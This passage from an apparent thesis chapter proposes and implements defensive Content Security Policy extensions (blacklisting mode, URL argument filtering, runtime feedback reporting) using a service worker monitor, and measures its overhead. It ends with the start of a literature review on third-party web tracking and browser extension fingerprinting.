In CSP, to collect the violation reports sent by browsers, one must use the report-uri directive in CSP1 and CSP2, and the report-to directive in CSP3. As we have shown, only violations are reported to developers. Nonetheless, the content that actually loads in webpages represents valuable information that can be used to improve the security of the application, by helping to deploy more secure policies. Therefore, following the semantics of the report-to and report-uri directives used for reporting violations, we propose the monitor-uri and monitor-to directives for reporting to developers the content that effectively loads within a webpage. When content is allowed to load within the page upon enforcement of a CSP, browsers would generate a report, following an algorithm similar to the one used for generating violation reports [261,272,275], and send it to the endpoint specified in the monitor-uri or monitor-to directive. Listing 5.13 shows an example of a policy deployed to get feedback on the runtime enforcement of the policy, as well as to collect CSP violations.
script-src trusted.com; object-src ’none’;
report-uri /reports/violations;
monitor-uri /reports/feedback;
Listing 5.13 – Policy to collect violations and feedback
In this example, the monitor-uri directive follows exactly the semantics of the report-uri directive of CSP1 and CSP2.
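For illustration only, a feedback report could carry fields similar to those of a CSP violation report; the shape below is a hypothetical example (the field names are ours and not defined by any specification).

// Hypothetical feedback report that a browser could POST to /reports/feedback
// once the page reaches a stable state (illustrative field names only).
const feedbackReport = {
  "document-uri": "https://example.com/page.html",
  "policy": "script-src trusted.com; object-src 'none'",
  "allowed-resources": [
    { "type": "script", "url": "https://trusted.com/app.js" },
    { "type": "script", "url": "https://trusted.com/vendor.js" }
  ]
};

// Submission could mirror violation reports, e.g.:
// fetch("/reports/feedback", { method: "POST", body: JSON.stringify(feedbackReport) });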
3.5 Backwards compatibility and implementation overhead
The changes we propose are all backwards-compatible. Browsers not supporting the new
extensions will simply ignore them. The extensions we propose to the CSP specification
only introduce a few modifications to the implementations of CSP in browsers. For instance,
the blacklisting mode does not require browsers to support a new algorithm, but reuses exactly the URL matching algorithm already implemented by browsers [272,275]. The only requirement is support for a new CSP header. If a browser already implements CSP, it just enforces a blacklisting policy as a normal one; the sole difference is in the final decision: when a URL matches a blacklisting policy, the URL is not allowed, while in whitelisting mode it is allowed. The only modifications needed to the CSP URL matching algorithm are those supporting the URL parameter filtering mechanism and the new directives. The algorithm for filtering out unsafe URL parameters is rather simple to implement. We provide an implementation of this additional algorithm in Section 4, using the URLSearchParams JavaScript API [145]. We refer to it as the URL parameters checker. It consists of a dozen lines of code. In doing so, we did not modify the URL matching algorithm itself; we rather implemented a dedicated function for matching CSP against URL parameters. As such, we preserve backwards compatibility in browsers. An implementation of the URL parameters checker can be plugged into an already existing implementation of the URL matching algorithm [261,272,275] of CSP in order to further apply filtering on URL arguments. Hence, after matching a URL against the policy, the URL is passed to the parameters checker, which further checks that the URL does not carry unsafe parameters; if it does, the related content is blocked from loading. Regarding partially whitelisted origins, when a URL is the result of a redirection, the whole URL, and not only its origin, is checked against the policy if the disallow-redirects directive is used in the policy. If the URL is not explicitly allowed by the policy, it is prevented from loading.
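A minimal sketch of the decision inversion just described, where urlMatchesPolicy stands in for the standard CSP URL matching algorithm (an assumed helper, not a real API):

function isAllowed(url, policy, mode) {
  const matches = urlMatchesPolicy(url, policy); // standard CSP URL matching (assumed helper)
  if (mode === "blacklisting") return !matches;  // in blacklisting mode, a match means "block"
  return matches;                                // in whitelisting mode, a match means "allow"
}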
4 Implementation
In this section, we demonstrate an implementation of the proposed extensions to the CSP specification, and an evaluation, using service workers. Our goal is to demonstrate that the CSP specification can easily be extended, in a backwards compatible way, with features that improve the security of web applications by allowing the expression of fine-grained policies. Even if these extensions are not supported in browsers, we argue that our implementation could already be deployed on real-world applications. To support this claim, we measured the overhead associated with deploying a service worker which applies CSP in blacklisting mode, filters URL arguments, and reports feedback, using an example web application.
Figure 5.1 – Monitoring CSP Enforcement (the monitor sits between the browser, the web application, and the Internet)
In our implementation, we deploy a monitor. It acts like a proxy, as shown in Figure 5.1: it intercepts requests made by the browser to load content in a web application. It is seamlessly and easily integrated into the application by the developer on the server side, without requiring users or browsers to undertake any particular action. In addition to deploying a CSP in enforcement mode that will be enforced by the browser, the developer also
deploys a CSP in blacklisting mode. In this policy, the developer can express fine-grained rules regarding unsafe URL parameters, partially whitelisted origins, and blacklisted content, and provide an endpoint to which feedback is submitted. The CSP in enforcement mode is enforced by the browser, while the one in blacklisting mode is enforced by the monitor. When content is injected in a webpage, the CSP in enforcement mode is first enforced by the browser. When a URL matches the policy, the browser makes a request to fetch its content. This request is intercepted by the monitor, and the CSP in blacklisting mode is applied. Upon enforcement, the monitor checks that the URL is not blacklisted and does not carry unsafe parameters. In the particular case of partially whitelisted origins, HTTP redirections are not visible to service workers for privacy reasons [275]. Nevertheless, to implement the semantics of the disallow-redirects directive, one can use the blacklisting and URL filtering mechanisms to either blacklist open redirect endpoints or filter out their unsafe parameters. Once a URL is allowed by the monitor upon enforcement of the policy in blacklisting mode, the request is made; otherwise, it is blocked. The monitor also logs all requests that it intercepts, and reports them as feedback about the enforcement of CSP in the browser.
The monitor is not meant to replace the CSP enforcement provided by browsers. It rather complements it by filling the expressiveness gap that prevents CSP from fully mitigating bypasses, and it adds a reporting mechanism that gives developers the set of content being loaded in the application.
4.1 Implementation of the URL filtering algorithm
In the following, we provide an example implementation of the URL arguments checker algorithm.
function unsafeArguments(origin, url) {
    // Origin with no "?": blacklisting is at the origin level, block the URL.
    if (origin.indexOf("?") == -1)
        return true;
    var oArgs = origin.split("?").slice(1).join("?"),
        uArgs = url.split("?").slice(1).join("?");
    // Origin blacklists any argument, but the URL carries none: allow.
    if (!oArgs && !uArgs)
        return false;
    var oparams = new URLSearchParams(oArgs || ""),
        uparams = new URLSearchParams(uArgs || "");
    for (var it of oparams.keys()) {
        // A blacklisted argument is absent from the URL: allow.
        if (!uparams.has(it)) {
            return false;
        } else {
            var ovalue = oparams.get(it) || "",
                uvalue = uparams.get(it) || "";
            // The blacklisted argument value differs from the URL value: allow.
            if (ovalue && ovalue != uvalue) {
                return false;
            }
        }
    }
    // All blacklisted arguments (and values) are found in the URL: block.
    return true;
}
Listing 5.14 – Implementation of the URL arguments matching algorithm using the
URLSearchParams API [145] in JavaScript
The implementation is done in JavaScript, using the URLSearchParams API [145]. If
the function returns true, then the URL is blocked, otherwise it is allowed. Recall that
blacklisting URL arguments is meant to be used with CSP in blacklisting mode. So, the
URL matching algorithm is first applied. Then, when the URL matches an origin in the
Table 5.1 – Matching arguments in an origin against arguments in a URL

Origin                 URL                                  Match
a.com/?                a.com/s.js                           ✗
a.com/?                a.com/s.js?func=eval                 ✓
a.com/?                a.com/s.js?func=eval&arg=hello       ✓
a.com?func             a.com/s.js                           ✗
a.com?func             a.com/s.js?arg=hello                 ✗
a.com?func             a.com/s.js?func=alert                ✓
a.com?func             a.com/s.js?func=alert&arg=hello      ✓
a.com?func=eval        a.com/s.js                           ✗
a.com?func=eval        a.com/s.js?arg=hello                 ✗
a.com?func=eval        a.com/s.js?func=alert                ✗
a.com?func=eval        a.com/s.js?func=eval                 ✓
a.com?func=eval        a.com/s.js?func=eval&arg=hello       ✓
a.com?func=eval&arg    a.com/s.js                           ✗
a.com?func=eval&arg    a.com/s.js?func=eval&arg=hello       ✓
a.com?func=eval&arg    a.com/s.js?func=alert&arg=hello      ✗
blacklisted CSP, it is further passed to the arguments checker. If the blacklisted origin does not declare any unsafe arguments, the URL is blocked, since it already matches the blacklisted origin; we say that the blacklisting is at the origin level. Otherwise, if the blacklisted origin specifies unsafe arguments, the URL is blocked only if its arguments match the blacklisted arguments of the origin; in this case, we say that the blacklisting is at the arguments level. Section 3.2 gives all the details about filtering out URL parameters.
Given an origin and a URL, the URL arguments checker checks whether the blacklisted
arguments of the origin are found among the arguments of the URL. Table 5.1 shows the
application of this algorithm on different origins and URLs. When there is a match between
the origin and the URL, then the URL is blocked.
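For illustration, here are a few calls to the unsafeArguments function of Listing 5.14 that reproduce rows of Table 5.1 (a return value of true means that the URL is blocked):

unsafeArguments("a.com/?", "a.com/s.js");                     // false: the URL carries no arguments
unsafeArguments("a.com/?", "a.com/s.js?func=eval");           // true:  any argument is blacklisted
unsafeArguments("a.com?func", "a.com/s.js?arg=hello");        // false: the blacklisted argument is absent
unsafeArguments("a.com?func=eval", "a.com/s.js?func=alert");  // false: the argument values differ
unsafeArguments("a.com?func=eval", "a.com/s.js?func=eval");   // true:  blacklisted argument and value match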
4.2 Implementation of the URL matching algorithm
We also provide an implementation of the CSP2 URL matching algorithm [275]. We considered CSP2 since it is the latest stable version of CSP. The implementation allows us to match origins against URLs (blacklisting mode) before checking the URL arguments against the origin arguments. Our implementation follows the specification. The code is available online at https://swexts.000webhostapp.com/monitor/.
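While the code online follows the full CSP2 algorithm, the following simplified sketch of matching a URL against a source expression of the form [scheme://]host[:port][/path] gives the idea; keyword sources ('self', nonces, ...) and the full normalization steps of the specification are omitted.

// Simplified sketch of CSP source-expression matching (not the full CSP2 algorithm).
function matchesSource(expr, urlString) {
    var url = new URL(urlString);
    var m = expr.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^\/:]+)(?::(\d+|\*))?(\/[^?#]*)?$/i);
    if (!m) return false;
    var scheme = m[1] && m[1].toLowerCase(),
        host = m[2].toLowerCase(),
        port = m[3],
        path = m[4];
    if (scheme && scheme + ":" !== url.protocol) return false;
    if (host.indexOf("*.") === 0) {
        // Wildcard host: *.example.com matches any subdomain of example.com
        if (!url.hostname.endsWith(host.slice(1))) return false;
    } else if (host !== url.hostname) {
        return false;
    }
    var urlPort = url.port || (url.protocol === "https:" ? "443" : "80");
    if (port && port !== "*" && port !== urlPort) return false;
    if (path) {
        if (path.charAt(path.length - 1) === "/") {
            // A path ending with "/" is a prefix match
            if (url.pathname.indexOf(path) !== 0) return false;
        } else if (url.pathname !== path) {
            return false;
        }
    }
    return true;
}

// Example: matchesSource("http://localhost:5000/ajax/libs/angular.js/",
//   "http://localhost:5000/ajax/libs/angular.js/1.7.2/angular-animate.js") returns true.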
4.3 Service workers
Service workers [149] are an experimental technology, already implemented in major browsers
including Chrome, Firefox, Opera, Microsoft Edge and Safari 2. They act as a proxy: they are part of the application itself, yet they can intercept all HTTP requests made by the browser to load content in the application. Service workers are deployed as part of the application but, once executed, they reside in the browser and intercept all requests going out of the application, as well as all incoming responses destined to the application. Service workers
have been introduced among other things, to enable web applications to provide users with
2. https://jakearchibald.github.io/isserviceworkerready/
an offline experience when the network is unavailable. They perfectly fit the needs of our monitor, and we use them to implement it.
Description and set up
This quotation from the Mozilla Developer Network defines service workers very well [149]:
A service worker is an event-driven worker registered against an origin and a
path. It takes the form of a JavaScript file that can control the web page/site it
is associated with, intercepting and modifying navigation and resource requests,
and caching resources in a very granular fashion to give you complete control
over how your app behaves in certain situations, (the most obvious one being
when the network is not available.)
First of all, the service worker itself is a JavaScript file which makes use of the specific
APIs made available to it by browsers. Then the service worker is deployed by referencing
it in the application whose requests it intercepts and manages.
Intercepting requests The following listing shows how service workers intercept requests made from an application.
self.addEventListener('fetch', function(event) {
    var url = event.request.url;                      // URL of the intercepted request
    var content_type = event.request.destination;     // type of content being loaded (script, image, ...)
    var page = event.request.headers.get('referer');  // page from which the request is made
});
Listing 5.15 – Intercepting requests in service workers
To intercept the URLs of requests, service workers listen for fetch events, which are triggered each time a request is initiated by the browser to load content in the application. Note that those requests are made after the browser enforces the CSP of the application on the URL of the content to load. The request object of the event contains all the information necessary to make the request (URL of the request, type of content being loaded, the specific page from which the request is being made, data sent along with the request in the case of HTTP POST requests, ...) [149]. As shown in Listing 5.15, url represents the URL of a request intercepted by the service worker, content_type the type of content that the URL will load (script, image, ...) 3, and page the specific page of the application from which the request is being made. This helps, for instance, to deploy a single service worker for an entire application made of multiple pages. The monitor specifically makes use of these three pieces of information (URL of the request, content type and URL of the page), which are sufficient for it to check whether a request of the particular type should be allowed or not in the specific page. When the request is allowed, the monitor lets it proceed using the fetch API [54], as shown in Listing 5.16.
event.respondWith(
    fetch(event.request).then(function(response) {
        return response;
    })
);
Listing 5.16 – Making a request from the service worker
3. This information is not available on Firefox service workers
Otherwise, the request is blocked. This is achieved by generating and returning an empty
response in the monitor, using the Response API 4.
event.respondWith(
    new Response()
);
Listing 5.17 – Blocking a request
Deployment To deploy the service worker (monitor), one has to indicate to the browser the location (URL) of its code on the application server. Additionally, one indicates whether the monitor is deployed for a specific page or for an entire application (origin). To deploy the service worker for an entire application, one can simply modify the main (HTML) page of the application, and the service worker will then cover the entire application.
...
<script>
if ('serviceWorker' in navigator) {
    navigator.serviceWorker.register('/sw.js', { scope: '/' })
        .then(function(reg) {
            console.log('ServiceWorker Started');
        }).catch(function(error) {
            console.log('ServiceWorker Failed');
        });
}
</script>
...
Listing 5.18 – Deploying a service worker for an application
In Listing 5.18 above, sw.js is the JavaScript file of the service worker located on the
application server, and the service worker is registered for the entire application scope:
’/’.
Enforcement of the CSP in blacklisting mode
We have already described an implementation of the URL checker algorithm (see Listing 5.14) and an implementation of the CSP URL matching algorithm (Section 4.2). All these implementations are included in the service worker file that is deployed. When a web server sends a CSP in blacklisting mode (using the Content-Security-Policy-Blacklisting HTTP header) with the response to a request to load a webpage, the monitor intercepts and saves on the fly the CSP in blacklisting mode. Then, when a request to load content on the page is intercepted (Listing 5.15), the URL of the request is checked against the blacklisting policy of the page. If the URL of the request does not match the blacklisting policy, the request is made normally (Listing 5.16). Otherwise, the request is blocked; in this case, the monitor (service worker) returns an empty response (Listing 5.17).
In any case, all intercepted requests are logged. Requests that are blocked (because they are blacklisted content or because of their unsafe parameters) are logged as well. These logs are submitted to the endpoint specified by the developer in the monitor policy. In our implementation, the reports are sent every 15 seconds 5; they constitute the feedback about the enforcement of CSP on the application. In our implementation, we fix the URL to which the feedback is sent.
4. https://developer.mozilla.org/en-US/docs/Web/API/Response
5. We have chosen this number arbitrarily, as all content on our example pages is loaded before this delay expires.
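As an illustration, the pieces described above could be assembled in the service worker roughly as follows. This is a minimal sketch: the reporting endpoint is hypothetical, matchesBlacklist stands for the combination of the URL matching algorithm (Section 4.2) and the arguments checker (Listing 5.14), and a production implementation would need a more robust reporting strategy, since timers are not guaranteed to survive service worker termination.

var blacklistPolicy = null;   // saved from the Content-Security-Policy-Blacklisting header
var reports = [];

self.addEventListener('fetch', function(event) {
    var url = event.request.url;
    var type = event.request.destination;
    // matchesBlacklist() stands for URL matching (Section 4.2) + arguments checking (Listing 5.14)
    var blocked = blacklistPolicy !== null && matchesBlacklist(blacklistPolicy, url, type);
    reports.push({ url: url, type: type, blocked: blocked });
    if (blocked) {
        event.respondWith(new Response());        // block: return an empty response
    } else {
        event.respondWith(fetch(event.request));  // allow: forward the request
    }
});

// Report the logged requests to the developer's endpoint every 15 seconds.
setInterval(function() {
    if (reports.length === 0) return;
    fetch('https://example.com/csp-feedback', {   // hypothetical reporting endpoint
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify(reports)
    });
    reports = [];
}, 15000);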
We provide online at https://swexts.000webhostapp.com/monitor/ our ready-to-use monitor, together with guidelines on how to easily integrate it into web applications.
5 Evaluation
We deployed the monitor on an example web application (located on the localhost), with
different types of content (scripts, images, stylesheets, fonts, XMLHttpRequests, etc.).
The CSP of the page is shown in the following Listing 5.19.
script-src 'self' http://localhost:5000 http://localhost:7000
Listing 5.19 – CSP in enforcement mode deployed on the webpage
It allows scripts from the site's own origin and from two third party origins. To simulate third party origins, we deployed multiple example applications on different ports of localhost (ports 5000 and 7000). The application itself is deployed on port 8000. To further apply additional checks on the URLs of requests to these origins (the two third party origins in particular), we deployed the CSP in blacklisting mode shown in Listing 5.20.
script-src http://localhost:5000/ajax/libs/angular.js/ http://localhost:7000/?
Listing 5.20 – Blacklisting CSP used to apply further checks on the content allowed
by the CSP in enforcement mode
It blacklists (excludes) scripts whose paths start with http://localhost:5000/ajax/
libs/angular.js/ from the origin http://localhost:5000 whitelisted in the CSP of
Listing 5.19. URLs to http://localhost:7000 that carry any arguments will also be
blocked by the monitor.
The deployed monitor successfully enforced the blacklisting policy on content we injected in the application. We also tested the monitor with nonce-based strict CSPs, and with toy browser extensions injecting content in the webpage. All such content was successfully intercepted by the monitor, which applied the CSP in blacklisting mode to it. Finally, the monitor was also able to log and report all intercepted, blocked, and loaded content. On a real web application, by analyzing the reported feedback, one may be able to detect potentially malicious or untrusted content loaded as a result of errors or misconfigurations, or as a result of an attacker exploiting a content injection vulnerability in the application. This also includes content dynamically injected under strict CSPs, and content injected by browser extensions.
The following is a report sent by the monitor upon enforcement of the blacklisting policy.
[
  {
    "url": "http://localhost:8000/script.js?BNfWB8tsrM",
    "type": "script",
    "blocked": false
  },
  {
    "url": "http://localhost:8000/script.js?K3Vc6ksIeV",
    "type": "script",
    "blocked": false
  },
  {
    "url": "http://localhost:7000/scripts/cspinclusion.js?callback=zleYLgrXNQ",
    "type": "script",
    "blocked": true
  },
  {
    "url": "http://localhost:5000/ajax/libs/angular.js/1.7.2/angular-animate.js",
    "type": "script",
    "blocked": true
  },
  {
    "url": "http://localhost:7000/scripts/cspinclusion.js",
    "type": "script",
    "blocked": false
  },
  {
    "url": "http://localhost:8000/script.js?AyhR4pkCaJ",
    "type": "script",
    "blocked": false
  },
  {
    "url": "http://localhost:8000/script.js?VPJS8xfJbn",
    "type": "script",
    "blocked": false
  },
  {
    "url": "http://localhost:7000/scripts/cspinclusion.js?callback=QZ4d2uiq8Y",
    "type": "script",
    "blocked": true
  },
  {
    "url": "http://localhost:7000/scripts/cspinclusion.js?callback=cmkRJvjPih",
    "type": "script",
    "blocked": true
  }
]
Listing 5.21 – Feedback reported by the monitor
Entries in the report array with the "blocked": true property correspond to content that is allowed by the CSP of the page as enforced by the browser, but blocked by the monitor after applying the blacklisting CSP.
5.1 Performance overhead
We evaluated the overhead introduced in a web application by the use of the monitor. To do so, our example webpage embeds a set of content of different types. In particular, it has three scripts for measuring the load time of the application:
— A first script which, when executed, registers the start time. It is the first script loaded in the webpage.
— A second script, responsible for dynamically loading in the webpage many contents of different types (scripts, stylesheets, fonts, images, etc.).
— A third script, injected last, responsible for measuring the end time. It is the last script executed in the webpage.
The page is composed of the following content:
— 20 scripts, each further making 1 synchronous XMLHttpRequest;
— 20 stylesheets, each further loading 1 font;
— 20 (JPG) images.
The application is served from localhost to avoid the latency and delay that the network would introduce if it were deployed on a remote server. Time is measured using the performance 6 API, 100 times, in different browsers (Chrome, Firefox, Opera, and Brave). Loaded resources are never cached, so that all measurements are done under the same conditions.
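For clarity, the first and third measurement scripts could be as simple as the following sketch (the file names and the global variable name are illustrative):

// start.js – first script loaded in the webpage: record the start time
window.__startTime = performance.now();

// end.js – last script executed in the webpage: compute and log the load time
var loadTime = performance.now() - window.__startTime;
console.log("Content loaded in " + loadTime + " ms");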
A first measurement is done when the application does not deploy any monitor (No Monitor). Then, another measurement is done when the monitor does not perform any action apart from simply forwarding all the requests that it intercepts (Unenforced Monitor), without applying the monitor policy; this measures the overhead introduced by the use of service workers alone. Finally, a last measurement is done when the monitor enforces a blacklisting policy (Enforced Monitor).
The different times are shown in Figure 5.2 for the Chrome browser, version 66, on an Intel(R) Core(TM) i7-4710MQ CPU @ 2.50GHz, 64 bits, with 16 GB of RAM. Results in other browsers are similar and therefore omitted.
Figure 5.2 – Performance overhead of deploying the monitor (load time in ms, over 100 measurements, for the No Monitor, Unenforced Monitor and Enforced Monitor configurations)
As one may observe, the main overhead is due to the use of service workers to implement the monitor (Unenforced Monitor). Comparatively, enforcing the monitor policy itself introduces a negligible overhead (Enforced Monitor). We think that this is an acceptable overhead compared to the security benefits gained by deploying the monitor.
Overhead of applying the CSP in blacklisting mode
We further measured the specific overhead of applying CSP within the monitor to blacklist content. To do so, we collected the CSP and scripts of 100k Alexa sites (home pages and up to 100 pages related 7 to the site). When a page had a CSP, we extracted the whitelisted origins of its script-src directive. This resulted in 6,481 unique sets of script-src
6. https://developer.mozilla.org/en-US/docs/Web/API/Performance
7. Pages from the same origin as the site, and pages from a subdomain
directives and the associated values. We further gathered all the origins whitelisted in all script-src directives into a single set of unique origins, totaling 11,982 of them. Then we randomly selected 6,481 scripts, corresponding to the number of unique script-src directives. To each script, using our implementation of the CSP URL matching algorithm, we applied all the 11,982 unique origins to check whether there was a match or not, and saved the time it took for the algorithm to terminate. We then computed the average time for applying all the 11,982 origins to a script. Figure 5.3 presents the results.
Figure 5.3 – Overhead introduced by applying CSP to content
The overhead introduced by applying CSP is negligible. Assuming that a directive contains 100 origins, in the worst case the overhead introduced by applying CSP is less than 2.5 ms, which, in our opinion, is acceptable compared to the security benefits gained by deploying CSP in blacklisting mode.
6 Discussions and limitations
Here we discuss the limitations of service workers, which we used to implement the monitor in this work.
6.1 Service workers
Service workers are still a working draft at the W3C 8, even though they are already supported by major browsers, including Firefox, Chrome, Opera, Microsoft Edge and Safari. They are backwards compatible: browsers not supporting them will simply not deploy the monitor, without breaking the application. Developers do not have to serve specific versions of the application for browsers that do not support service workers. Deploying the monitor as shown in Listing 5.18 (Section 4) ensures its backwards compatibility. The only modification required is in the entry page of the application, where the monitor is registered using an HTML script tag. Even though using service workers introduces an overhead, there are many improvements which can compensate for it, in addition to the security benefits that one gains by deploying them. Responses to requests can be cached
8. https://w3c.github.io/ServiceWorker/
in the monitor. Later on, when the application makes a request for the same content, it is retrieved from the cache and returned to the application. In this work, we have shown an implementation of the monitor using service workers. The monitor presents the advantage of lying outside of the browser's enforcement of CSP: it only intercepts requests after they are allowed by the browser upon enforcement of the CSP of the page. This allows further checks for blacklisted content or content with unsafe arguments. In the monitor, we log requests and can delay the reporting time. Nonetheless, service workers have limitations. They work only for secure (HTTPS) web applications (and localhost). They do not work in Firefox private browsing mode. Also, in Firefox it is not easy to get the type (script, image, ...) of an intercepted request. Service workers cannot intercept requests to load cross-origin iframes, for security reasons. Nonetheless, the monitor can be successfully deployed for content which executes in the context of the application, such as scripts, plugins, stylesheets, images, etc.
Alternative methods can also be used to implement the monitor, especially for browsers not yet supporting service workers: JavaScript proxies [82], or redefining JavaScript objects to intercept the injection of content [254]. To get all content that is injected in a webpage, similarly to a restrictive CSP in report-only mode (see Section 2), one can use Mutation Observers [102]. They allow watching all changes made to the DOM of a webpage; as such, one can record all content that is injected in the webpage (see the sketch below). These methods have many drawbacks. The first one is that they can potentially interfere with CSP enforcement as done by browsers. Moreover, contrary to these methods, service workers are easy to deploy and can monitor all pages of entire web applications.
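A minimal sketch of this Mutation Observer approach, recording the source of every element injected into the DOM (for illustration only):

var observer = new MutationObserver(function(mutations) {
    mutations.forEach(function(mutation) {
        mutation.addedNodes.forEach(function(node) {
            // Record elements that load external content (scripts, images, iframes, ...)
            if (node.nodeType === Node.ELEMENT_NODE && (node.src || node.href)) {
                console.log("Injected content:", node.tagName, node.src || node.href);
            }
        });
    });
});
// Watch the whole document for injected nodes
observer.observe(document.documentElement, { childList: true, subtree: true });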
6.2 Browser extensions
Contrary to CSP in report-only mode, our monitor intercepts all content, even content injected by browser extensions directly in the context of web applications. Content that browser extensions directly inject in the context of web applications 9 is usually not subject to the CSP of the page, and browsers would not block it. Such content is also intercepted by the monitor. Even if the browser allows it to load although it does not match the CSP of the page, the monitor would block it if it is not allowed by the blacklisting policy. Blocking such requests may however break extension functionality. We did not assess how widespread this practice is among extensions, but application developers have to take this into consideration when deploying our monitor. Should extension content be blocked or not? Developers have to find a trade-off between the security of their applications and preserving the functionality of extensions [249].
6.3 Privacy implications of the reporting mechanism
In general, our proposal of monitoring the runtime enforcement of CSP has to be discussed in the scope of browser extensions. Currently, a developer can observe content injected by browser extensions in web applications by inspecting the DOM, setting up a Mutation Observer [102], or deploying a service worker as we have done. Since content injected in web pages by browser extensions is visible to web pages, we argue that browser vendors may also report such content to developers when reporting the runtime enforcement of CSP. Therefore, reporting content does not leak any further information than what could
9. These are not content scripts, as content scripts execute in their own contexts. These are content fur-
ther injected by content scripts directly in the context of web pages (See https://developer.chrome.com/
extensions/content_scripts). In Chrome and Opera, even web accessible resources are also intercepted
(See https://developer.chrome.com/extensions/manifest/web_accessible_resources)
already be obtained with the example techniques given above. Our proposal is just an efficient way of getting this feedback, without relying on the techniques presented here, given their limitations.
There are however cases where extension developers would like to hide their injected content from web applications. For instance, in Firefox, injecting a browser extension's own content, called web accessible resources, leaks the extension's unique identifier, which is unique on a per-user basis. If this identifier is leaked to the web application, it can serve to uniquely identify and track the user in future browsing sessions, as the identifier is unique to the extension and does not change throughout browsing sessions [245]. In general, it is difficult to hide this identifier from web applications: setting up a mutation observer allows intercepting the identifier. We think that such content must also be reported, as it can already be observed by different means.
There is however one technique, recommended to prevent leaking the extension's identifier in the particular case of iframe injection, as discussed on Bugzilla [20].
var f = document.createElement("iframe");
document.body.appendChild(f);
f.contentWindow.location = chrome.extension.getURL("iframe.htm");
As shown in the listing above, one can inject an iframe without leaking the unique identifier of the extension. From a mutation observer, it is not possible to observe the URL of such an iframe, and scripts running in the page cannot observe it either. Finally, service workers cannot intercept the URLs of cross-origin iframes. In this situation, and for the sake of user privacy, one may argue that the monitor of the runtime enforcement of CSP must not report the URLs of iframes included in this manner. We think that since such content is included in the webpage, it must also be reported.
7 Conclusion
In this work, we propose four new extensions to the current CSP specification: a new blacklisting mode, the ability to blacklist content based on unsafe URL arguments, new directives for explicitly preventing redirections to partially whitelisted origins, and an efficient monitoring mechanism for collecting feedback on the runtime enforcement of CSP. These extensions are all backwards compatible; they do not break the current state of the specification, nor do they require significant modifications to current browser implementations of the specification. We demonstrated an implementation of the new extensions using service workers, to monitor and intercept content that is loaded upon enforcement of the policy, and to apply additional checks on the URLs of content. We then evaluated the overhead of deploying such a policy on a web application. The monitor is easily integrated into the application by the developer from the server side, without requiring users or browsers to undertake any particular action.
Part II
Third party web tracking
Introduction
A number of studies have demonstrated that third party tracking is very prevalent on the
web today and they have analyzed the underlying tracking technologies [188,217,225,242].
Lerner et al. [222] analyzed how third party tracking evolved over a period of twenty years. Trackers have been categorized either according to their business relationships with websites [225], their prominence [188,217], or the user browsing profile that they can build [242]. Mayer and Mitchell [225] grouped tracking mechanisms into two categories called stateful (cookie-based and super-cookies) and stateless (fingerprinting). It is rather intuitive to convince ourselves of the effectiveness of stateful tracking, since it is based on unique identifiers that are set in users' browsers. Nonetheless, the efficacy of stateless mechanisms has also been extensively demonstrated. Since the pioneering work of Eckersley [185], browser fingerprinting methods have been extensively studied in the literature [163-165,173,180,188,221,230,259,263]. A classification of fingerprinting techniques is provided in [264]. Those studies have contributed to raising public awareness of tracking privacy threats. Mayer and Mitchell [225] have shown that users are very sensitive to their online privacy, and thus hostile to third party tracking. Englehardt et al. [189] have demonstrated that tracking can be used for surveillance purposes. The success of anti-tracking defenses is yet another illustration that users are concerned about tracking [226].
Extensions and web logins detection Since 2006, there have been multiple proposals to detect and enumerate a user's browser extensions [175,182,193,216]. Most of them were blog posts meant to raise awareness in the security community, but they did not aim to scientifically evaluate extension detection at large scale, nor to perform user studies that could explain how extensions contribute to browser fingerprinting. Similarly, there has been an ongoing discussion on web login detection in the security community [169,187,194,206,207,223], but no quantitative studies had been made until our work.
Sjösten et al. [249] provided the first large scale study on enumerating all free browser extensions available for Chrome and Firefox. The authors found that 38.96% of the top 10k extensions in the Chrome Web Store were detectable with WARs. While their work lacked an evaluation of user uniqueness or fingerprintability, it disclosed the fact that 28 of the Alexa top 100k sites already used extension detection. This finding made it clear that extension detection is more than a theoretical privacy threat, and thus deserves further study.
Starov and Nikiforakis [260] were the first to analyze the fingerprintability of browser extensions and to evaluate how unique users are based on their extensions. They detected extensions based on the changes they make to webpages. They examined the top 10,000 Chrome extensions and found that 9.2% of them were detectable on any website, and 16.6% made detectable changes on specific domains with 90% accuracy. They analyzed the stability of the proposed detection method: for a sample of 1,000 extensions, they concluded that 88% of extensions were still detectable after 4 months. To evaluate the uniqueness of users based on their browser extensions, the authors collected the installed extensions of 854 users.
To detect 5 extensions, their testing website needed roughly 250 ms.
Sánchez-Rola et al. [245] detected browser extensions through a timing side-channel attack, and were able to detect all extensions in Firefox and Chrome that use access control settings, regardless of the site visited. Their detection technique also relies on WARs. When querying a non-existent (fake) WAR of an extension, the authors observed a difference in the time the browser takes to respond to the query, depending on whether the extension is installed in the user's browser or not. The time difference is caused by the access control mechanism that the browser applies when the concerned extension is installed. Because of this timing method, they had to make 10 calls per extension. To quantify the fingerprintability of users, they collected fingerprints from only 204 users and tested for 2,000 Chrome and Firefox extensions. In total, their users had 174 extensions that were fingerprintable.
Tracking protection There are a number of defenses that try to protect users against third party tracking. First, major browser vendors provide mechanisms for users to block third party cookies or to browse in private/incognito mode, for instance. More and more browsers go a step further by considering privacy as a design principle: Brave Browser [16], Tor Browser [136], TrackingFree [234], Blink [221], CLIQZ [29]. Pierre Laperdrix has done substantial work on browser fingerprinting and its stability, and proposed different countermeasures to mitigate it [191,218-221,266].
Well known trackers, such as advertisers, whose businesses heavily depend on their ability to track users, have also been taking steps towards limiting their own tracking capabilities [225]. The W3C is pushing forward the Do Not Track standard [137,138] for users to easily express their tracking preferences so that trackers may comply with them.
But the most popular defenses are browser extensions. Being tightly integrated into browsers, they provide additional privacy features that are not implemented in browsers by default. Well known privacy extensions are Disconnect [47], Ghostery [61], ShareMeNot [242] (which is now part of PrivacyBadger [117]), uBlock Origin [139] and the relatively new MyTrackingChoices [167]. Merzdovnik et al. [226] provide a large-scale evaluation of these anti-tracking defenses.
Tracking protection from the server-side
In Chapter 6, we describe and implement a privacy-preserving web architecture that gives website developers control over third party tracking: developers are able to include functionally useful third party content, while at the same time ensuring that end users are not tracked by the third parties. The architecture consists of two main components: a ready-to-deploy Rewrite Server, deployed by the developer server-side in order to rewrite webpages, and more precisely the URLs of third party content, by prefixing them with the URL of the second component, the Middle Party Server. Therefore, when the page loads in a browser, all third party requests are redirected to the Middle Party Server. It is a ready-to-deploy trusted third party server, under the control of the developer. When it receives requests from the browser to load third party content, it removes any tracking information from the requests and forwards them to the third party. Likewise, when it receives a response from the third party, it removes tracking information and then returns the response to the browser.
